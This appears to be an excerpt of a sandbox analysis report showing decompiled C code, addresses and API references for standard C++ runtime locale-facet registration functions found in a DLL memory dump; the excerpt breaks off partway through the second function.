                          • API String ID: 113178234-0
                          • Opcode ID: 384db94be18ed0e5724856dfb2a9809d3d77c266152c34c1e825148bb8edba5b
                          • Instruction ID: c1249fca7f6cc80b9db5a7902068ea75e5d80f79faff2a3094615eaa3eb0b955
                          • Opcode Fuzzy Hash: 384db94be18ed0e5724856dfb2a9809d3d77c266152c34c1e825148bb8edba5b
                          • Instruction Fuzzy Hash: 33113279D0451ECBCF00DBE4C898AEDB7BBAF44B04F140919E510AB390CBB49B41CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F9F1, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E20F9F1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t83;
				signed int _t84;
				void* _t96;
				void* _t109;
				void* _t122;
				void* _t135;
				signed int _t207;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				void* _t242;

				_t223 = __edx;
				_t172 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t242 - 0x14, 0);
				_t231 =  *0x6e2c6de0; // 0x0
				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
				 *(_t242 - 0x10) = _t231;
				_t83 = E6E1E161C(0x6e2c6d8c);
				_t175 =  *((intOrPtr*)(_t242 + 8));
				_t84 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t83);
				_t225 = _t84;
				if(_t84 != 0) {
					L5:
					E6E2066BA(_t242 - 0x14);
					return E6E220075(_t225);
				} else {
					if(_t231 == 0) {
						_push( *((intOrPtr*)(_t242 + 8)));
						_push(_t242 - 0x10);
						__eflags = E6E211471(__ebx, _t175, __edx, _t225, _t231) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t242 - 0x20);
							E6E223D74(_t242 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t225, _t231, 0x14);
							E6E206653(_t242 - 0x14, 0);
							_t232 =  *0x6e2c6dfc; // 0x0
							 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
							 *(_t242 - 0x10) = _t232;
							_t96 = E6E1E161C(0x6e2c6da8);
							_t182 =  *((intOrPtr*)(_t242 + 8));
							_t226 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t96);
							__eflags = _t226;
							if(_t226 != 0) {
								L12:
								E6E2066BA(_t242 - 0x14);
								return E6E220075(_t226);
							} else {
								__eflags = _t232;
								if(_t232 == 0) {
									_push( *((intOrPtr*)(_t242 + 8)));
									_push(_t242 - 0x10);
									__eflags = E6E2114EC(_t172, _t182, __edx, _t226, _t232) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t242 - 0x20);
										E6E223D74(_t242 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t172, _t226, _t232, 0x14);
										E6E206653(_t242 - 0x14, 0);
										_t233 =  *0x6e2c6dcc; // 0x0
										 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
										 *(_t242 - 0x10) = _t233;
										_t109 = E6E1E161C(0x6e2c6d80);
										_t189 =  *((intOrPtr*)(_t242 + 8));
										_t227 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t109);
										__eflags = _t227;
										if(_t227 != 0) {
											L19:
											E6E2066BA(_t242 - 0x14);
											return E6E220075(_t227);
										} else {
											__eflags = _t233;
											if(_t233 == 0) {
												_push( *((intOrPtr*)(_t242 + 8)));
												_push(_t242 - 0x10);
												__eflags = E6E211558(_t172, _t189, __edx, _t227, _t233) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t242 - 0x20);
													E6E223D74(_t242 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t172, _t227, _t233, 0x14);
													E6E206653(_t242 - 0x14, 0);
													_t234 =  *0x6e2c6e00; // 0x0
													 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
													 *(_t242 - 0x10) = _t234;
													_t122 = E6E1E161C(0x6e2c6dac);
													_t196 =  *((intOrPtr*)(_t242 + 8));
													_t228 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t122);
													__eflags = _t228;
													if(_t228 != 0) {
														L26:
														E6E2066BA(_t242 - 0x14);
														return E6E220075(_t228);
													} else {
														__eflags = _t234;
														if(_t234 == 0) {
															_push( *((intOrPtr*)(_t242 + 8)));
															_push(_t242 - 0x10);
															__eflags = E6E2115C4(_t172, _t196, _t223, _t228, _t234) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t242 - 0x20);
																E6E223D74(_t242 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t172, _t228, _t234, 0x14);
																E6E206653(_t242 - 0x14, 0);
																_t235 =  *0x6e2c6dd0; // 0x0
																 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
																 *(_t242 - 0x10) = _t235;
																_t135 = E6E1E161C(0x6e2c6d60);
																_t203 =  *((intOrPtr*)(_t242 + 8));
																_t229 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t135);
																__eflags = _t229;
																if(_t229 != 0) {
																	L33:
																	E6E2066BA(_t242 - 0x14);
																	return E6E220075(_t229);
																} else {
																	__eflags = _t235;
																	if(_t235 == 0) {
																		_push( *((intOrPtr*)(_t242 + 8)));
																		_push(_t242 - 0x10);
																		__eflags = E6E21162A(_t172, _t203, _t223, _t229, _t235) - 0xffffffff;
																		if(__eflags == 0) {
																			_t207 = _t242 - 0x20;
																			E6E1E1438(_t207);
																			E6E223D74(_t242 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e26851f, _t172, _t229, _t235, 4);
																			_t236 = _t207;
																			 *(_t242 - 0x10) = _t236;
																			 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)(_t242 + 0xc));
																			_push( *((intOrPtr*)(_t242 + 0x14)));
																			_t77 = _t242 - 4;
																			 *_t77 =  *(_t242 - 4) & 0x00000000;
																			__eflags =  *_t77;
																			 *_t236 = 0x6e26c0c4;
																			 *((char*)(_t236 + 0x28)) =  *((intOrPtr*)(_t242 + 0x10));
																			E6E21542F(_t172, _t207, _t223, _t229, _t236,  *_t77);
																			return E6E220075(_t236,  *((intOrPtr*)(_t242 + 8)));
																		} else {
																			_t229 =  *(_t242 - 0x10);
																			 *(_t242 - 0x10) = _t229;
																			 *(_t242 - 4) = 1;
																			E6E206FD3(__eflags, _t229);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t229 + 4))))();
																			 *0x6e2c6dd0 = _t229;
																			goto L33;
																		}
																	} else {
																		_t229 = _t235;
																		goto L33;
																	}
																}
															} else {
																_t228 =  *(_t242 - 0x10);
																 *(_t242 - 0x10) = _t228;
																 *(_t242 - 4) = 1;
																E6E206FD3(__eflags, _t228);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t228 + 4))))();
																 *0x6e2c6e00 = _t228;
																goto L26;
															}
														} else {
															_t228 = _t234;
															goto L26;
														}
													}
												} else {
													_t227 =  *(_t242 - 0x10);
													 *(_t242 - 0x10) = _t227;
													 *(_t242 - 4) = 1;
													E6E206FD3(__eflags, _t227);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t227 + 4))))();
													 *0x6e2c6dcc = _t227;
													goto L19;
												}
											} else {
												_t227 = _t233;
												goto L19;
											}
										}
									} else {
										_t226 =  *(_t242 - 0x10);
										 *(_t242 - 0x10) = _t226;
										 *(_t242 - 4) = 1;
										E6E206FD3(__eflags, _t226);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t226 + 4))))();
										 *0x6e2c6dfc = _t226;
										goto L12;
									}
								} else {
									_t226 = _t232;
									goto L12;
								}
							}
						} else {
							_t225 =  *(_t242 - 0x10);
							 *(_t242 - 0x10) = _t225;
							 *(_t242 - 4) = 1;
							E6E206FD3(__eflags, _t225);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t225 + 4))))();
							 *0x6e2c6de0 = _t225;
							goto L5;
						}
					} else {
						_t225 = _t231;
						goto L5;
					}
				}
			}





















                          0x6e20f9f1
                          0x6e20f9f1
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa22
                          0x6e20fa27
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F9F8
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20FA02
                          • int.LIBCPMT ref: 6E20FA19
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • numpunct.LIBCPMT ref: 6E20FA3C
                          • std::_Facet_Register.LIBCPMT ref: 6E20FA53
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20FA73
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20FA91
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
                          • String ID:
                          • API String ID: 2509942033-0
                          • Opcode ID: 5c127cc877e899947332e31e21906164a2b41964e81ce974a789dca12644fbfa
                          • Instruction ID: 25cf433e70bb9b3bbb59fe7f14114457af90a7abe063d505dcdecc3cddb429a5
                          • Opcode Fuzzy Hash: 5c127cc877e899947332e31e21906164a2b41964e81ce974a789dca12644fbfa
                          • Instruction Fuzzy Hash: 6911E37990052E8BCF00DBE4CC94AEEB77BAF44B14F244908E4116B2D0DFB49A45C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F60D, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E20F60D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t167;
				signed int _t168;
				void* _t180;
				void* _t193;
				void* _t206;
				void* _t219;
				void* _t232;
				void* _t245;
				void* _t258;
				void* _t271;
				void* _t284;
				void* _t297;
				signed int _t435;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				signed int _t478;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				signed int _t487;
				signed int _t488;
				signed int _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				signed int _t494;
				void* _t506;

				_t469 = __edx;
				_t358 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t506 - 0x14, 0);
				_t483 =  *0x6e2c6df4; // 0x0
				 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
				 *(_t506 - 0x10) = _t483;
				_t167 = E6E1E161C(0x6e2c6da0);
				_t361 =  *((intOrPtr*)(_t506 + 8));
				_t168 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t167);
				_t471 = _t168;
				if(_t168 != 0) {
					L5:
					E6E2066BA(_t506 - 0x14);
					return E6E220075(_t471);
				} else {
					if(_t483 == 0) {
						_push( *((intOrPtr*)(_t506 + 8)));
						_push(_t506 - 0x10);
						__eflags = E6E2111AB(__ebx, _t361, __edx, _t471, _t483) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t506 - 0x20);
							E6E223D74(_t506 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t471, _t483, 0x14);
							E6E206653(_t506 - 0x14, 0);
							_t484 =  *0x6e2c6dc8; // 0x0
							 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
							 *(_t506 - 0x10) = _t484;
							_t180 = E6E1E161C(0x6e2c6d7c);
							_t368 =  *((intOrPtr*)(_t506 + 8));
							_t472 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t180);
							__eflags = _t472;
							if(_t472 != 0) {
								L12:
								E6E2066BA(_t506 - 0x14);
								return E6E220075(_t472);
							} else {
								__eflags = _t484;
								if(_t484 == 0) {
									_push( *((intOrPtr*)(_t506 + 8)));
									_push(_t506 - 0x10);
									__eflags = E6E211230(_t358, _t368, __edx, _t472, _t484) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t506 - 0x20);
										E6E223D74(_t506 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t358, _t472, _t484, 0x14);
										E6E206653(_t506 - 0x14, 0);
										_t485 =  *0x6e2c6dc4; // 0x0
										 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
										 *(_t506 - 0x10) = _t485;
										_t193 = E6E1E161C(0x6e2c6d78);
										_t375 =  *((intOrPtr*)(_t506 + 8));
										_t473 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t193);
										__eflags = _t473;
										if(_t473 != 0) {
											L19:
											E6E2066BA(_t506 - 0x14);
											return E6E220075(_t473);
										} else {
											__eflags = _t485;
											if(_t485 == 0) {
												_push( *((intOrPtr*)(_t506 + 8)));
												_push(_t506 - 0x10);
												__eflags = E6E2112B4(_t358, _t375, __edx, _t473, _t485) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t506 - 0x20);
													E6E223D74(_t506 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t358, _t473, _t485, 0x14);
													E6E206653(_t506 - 0x14, 0);
													_t486 =  *0x6e2c6dd8; // 0x0
													 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
													 *(_t506 - 0x10) = _t486;
													_t206 = E6E1E161C(0x6e2c6d84);
													_t382 =  *((intOrPtr*)(_t506 + 8));
													_t474 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t206);
													__eflags = _t474;
													if(_t474 != 0) {
														L26:
														E6E2066BA(_t506 - 0x14);
														return E6E220075(_t474);
													} else {
														__eflags = _t486;
														if(_t486 == 0) {
															_push( *((intOrPtr*)(_t506 + 8)));
															_push(_t506 - 0x10);
															__eflags = E6E211339(_t358, _t382, _t469, _t474, _t486) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t506 - 0x20);
																E6E223D74(_t506 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t358, _t474, _t486, 0x14);
																E6E206653(_t506 - 0x14, 0);
																_t487 =  *0x6e2c6db0; // 0x0
																 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																 *(_t506 - 0x10) = _t487;
																_t219 = E6E1E161C(0x6e2c6d64);
																_t389 =  *((intOrPtr*)(_t506 + 8));
																_t475 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t219);
																__eflags = _t475;
																if(_t475 != 0) {
																	L33:
																	E6E2066BA(_t506 - 0x14);
																	return E6E220075(_t475);
																} else {
																	__eflags = _t487;
																	if(_t487 == 0) {
																		_push( *((intOrPtr*)(_t506 + 8)));
																		_push(_t506 - 0x10);
																		__eflags = E6E2113A1(_t358, _t389, _t469, _t475, _t487) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t506 - 0x20);
																			E6E223D74(_t506 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t358, _t475, _t487, 0x14);
																			E6E206653(_t506 - 0x14, 0);
																			_t488 =  *0x6e2c6ddc; // 0x0
																			 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																			 *(_t506 - 0x10) = _t488;
																			_t232 = E6E1E161C(0x6e2c6d88);
																			_t396 =  *((intOrPtr*)(_t506 + 8));
																			_t476 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t232);
																			__eflags = _t476;
																			if(_t476 != 0) {
																				L40:
																				E6E2066BA(_t506 - 0x14);
																				return E6E220075(_t476);
																			} else {
																				__eflags = _t488;
																				if(_t488 == 0) {
																					_push( *((intOrPtr*)(_t506 + 8)));
																					_push(_t506 - 0x10);
																					__eflags = E6E211409(_t358, _t396, _t469, _t476, _t488) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t506 - 0x20);
																						E6E223D74(_t506 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t358, _t476, _t488, 0x14);
																						E6E206653(_t506 - 0x14, 0);
																						_t489 =  *0x6e2c6de0; // 0x0
																						 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																						 *(_t506 - 0x10) = _t489;
																						_t245 = E6E1E161C(0x6e2c6d8c);
																						_t403 =  *((intOrPtr*)(_t506 + 8));
																						_t477 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t245);
																						__eflags = _t477;
																						if(_t477 != 0) {
																							L47:
																							E6E2066BA(_t506 - 0x14);
																							return E6E220075(_t477);
																						} else {
																							__eflags = _t489;
																							if(_t489 == 0) {
																								_push( *((intOrPtr*)(_t506 + 8)));
																								_push(_t506 - 0x10);
																								__eflags = E6E211471(_t358, _t403, _t469, _t477, _t489) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t506 - 0x20);
																									E6E223D74(_t506 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t358, _t477, _t489, 0x14);
																									E6E206653(_t506 - 0x14, 0);
																									_t490 =  *0x6e2c6dfc; // 0x0
																									 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																									 *(_t506 - 0x10) = _t490;
																									_t258 = E6E1E161C(0x6e2c6da8);
																									_t410 =  *((intOrPtr*)(_t506 + 8));
																									_t478 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t258);
																									__eflags = _t478;
																									if(_t478 != 0) {
																										L54:
																										E6E2066BA(_t506 - 0x14);
																										return E6E220075(_t478);
																									} else {
																										__eflags = _t490;
																										if(_t490 == 0) {
																											_push( *((intOrPtr*)(_t506 + 8)));
																											_push(_t506 - 0x10);
																											__eflags = E6E2114EC(_t358, _t410, _t469, _t478, _t490) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t506 - 0x20);
																												E6E223D74(_t506 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t358, _t478, _t490, 0x14);
																												E6E206653(_t506 - 0x14, 0);
																												_t491 =  *0x6e2c6dcc; // 0x0
																												 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																												 *(_t506 - 0x10) = _t491;
																												_t271 = E6E1E161C(0x6e2c6d80);
																												_t417 =  *((intOrPtr*)(_t506 + 8));
																												_t479 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t271);
																												__eflags = _t479;
																												if(_t479 != 0) {
																													L61:
																													E6E2066BA(_t506 - 0x14);
																													return E6E220075(_t479);
																												} else {
																													__eflags = _t491;
																													if(_t491 == 0) {
																														_push( *((intOrPtr*)(_t506 + 8)));
																														_push(_t506 - 0x10);
																														__eflags = E6E211558(_t358, _t417, _t469, _t479, _t491) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t506 - 0x20);
																															E6E223D74(_t506 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t358, _t479, _t491, 0x14);
																															E6E206653(_t506 - 0x14, 0);
																															_t492 =  *0x6e2c6e00; // 0x0
																															 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																															 *(_t506 - 0x10) = _t492;
																															_t284 = E6E1E161C(0x6e2c6dac);
																															_t424 =  *((intOrPtr*)(_t506 + 8));
																															_t480 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t284);
																															__eflags = _t480;
																															if(_t480 != 0) {
																																L68:
																																E6E2066BA(_t506 - 0x14);
																																return E6E220075(_t480);
																															} else {
																																__eflags = _t492;
																																if(_t492 == 0) {
																																	_push( *((intOrPtr*)(_t506 + 8)));
																																	_push(_t506 - 0x10);
																																	__eflags = E6E2115C4(_t358, _t424, _t469, _t480, _t492) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t506 - 0x20);
																																		E6E223D74(_t506 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t358, _t480, _t492, 0x14);
																																		E6E206653(_t506 - 0x14, 0);
																																		_t493 =  *0x6e2c6dd0; // 0x0
																																		 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																																		 *(_t506 - 0x10) = _t493;
																																		_t297 = E6E1E161C(0x6e2c6d60);
																																		_t431 =  *((intOrPtr*)(_t506 + 8));
																																		_t481 = E6E1E171B( *((intOrPtr*)(_t506 + 8)), _t297);
																																		__eflags = _t481;
																																		if(_t481 != 0) {
																																			L75:
																																			E6E2066BA(_t506 - 0x14);
																																			return E6E220075(_t481);
																																		} else {
																																			__eflags = _t493;
																																			if(_t493 == 0) {
																																				_push( *((intOrPtr*)(_t506 + 8)));
																																				_push(_t506 - 0x10);
																																				__eflags = E6E21162A(_t358, _t431, _t469, _t481, _t493) - 0xffffffff;
																																				if(__eflags == 0) {
																																					_t435 = _t506 - 0x20;
																																					E6E1E1438(_t435);
																																					E6E223D74(_t506 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e26851f, _t358, _t481, _t493, 4);
																																					_t494 = _t435;
																																					 *(_t506 - 0x10) = _t494;
																																					 *((intOrPtr*)(_t494 + 4)) =  *((intOrPtr*)(_t506 + 0xc));
																																					_push( *((intOrPtr*)(_t506 + 0x14)));
																																					_t161 = _t506 - 4;
																																					 *_t161 =  *(_t506 - 4) & 0x00000000;
																																					__eflags =  *_t161;
																																					 *_t494 = 0x6e26c0c4;
																																					 *((char*)(_t494 + 0x28)) =  *((intOrPtr*)(_t506 + 0x10));
																																					E6E21542F(_t358, _t435, _t469, _t481, _t494,  *_t161);
																																					return E6E220075(_t494,  *((intOrPtr*)(_t506 + 8)));
																																				} else {
																																					_t481 =  *(_t506 - 0x10);
																																					 *(_t506 - 0x10) = _t481;
																																					 *(_t506 - 4) = 1;
																																					E6E206FD3(__eflags, _t481);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t481 + 4))))();
																																					 *0x6e2c6dd0 = _t481;
																																					goto L75;
																																				}
																																			} else {
																																				_t481 = _t493;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t480 =  *(_t506 - 0x10);
																																		 *(_t506 - 0x10) = _t480;
																																		 *(_t506 - 4) = 1;
																																		E6E206FD3(__eflags, _t480);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t480 + 4))))();
																																		 *0x6e2c6e00 = _t480;
																																		goto L68;
																																	}
																																} else {
																																	_t480 = _t492;
																																	goto L68;
																																}
																															}
																														} else {
																															_t479 =  *(_t506 - 0x10);
																															 *(_t506 - 0x10) = _t479;
																															 *(_t506 - 4) = 1;
																															E6E206FD3(__eflags, _t479);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t479 + 4))))();
																															 *0x6e2c6dcc = _t479;
																															goto L61;
																														}
																													} else {
																														_t479 = _t491;
																														goto L61;
																													}
																												}
																											} else {
																												_t478 =  *(_t506 - 0x10);
																												 *(_t506 - 0x10) = _t478;
																												 *(_t506 - 4) = 1;
																												E6E206FD3(__eflags, _t478);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t478 + 4))))();
																												 *0x6e2c6dfc = _t478;
																												goto L54;
																											}
																										} else {
																											_t478 = _t490;
																											goto L54;
																										}
																									}
																								} else {
																									_t477 =  *(_t506 - 0x10);
																									 *(_t506 - 0x10) = _t477;
																									 *(_t506 - 4) = 1;
																									E6E206FD3(__eflags, _t477);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t477 + 4))))();
																									 *0x6e2c6de0 = _t477;
																									goto L47;
																								}
																							} else {
																								_t477 = _t489;
																								goto L47;
																							}
																						}
																					} else {
																						_t476 =  *(_t506 - 0x10);
																						 *(_t506 - 0x10) = _t476;
																						 *(_t506 - 4) = 1;
																						E6E206FD3(__eflags, _t476);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t476 + 4))))();
																						 *0x6e2c6ddc = _t476;
																						goto L40;
																					}
																				} else {
																					_t476 = _t488;
																					goto L40;
																				}
																			}
																		} else {
																			_t475 =  *(_t506 - 0x10);
																			 *(_t506 - 0x10) = _t475;
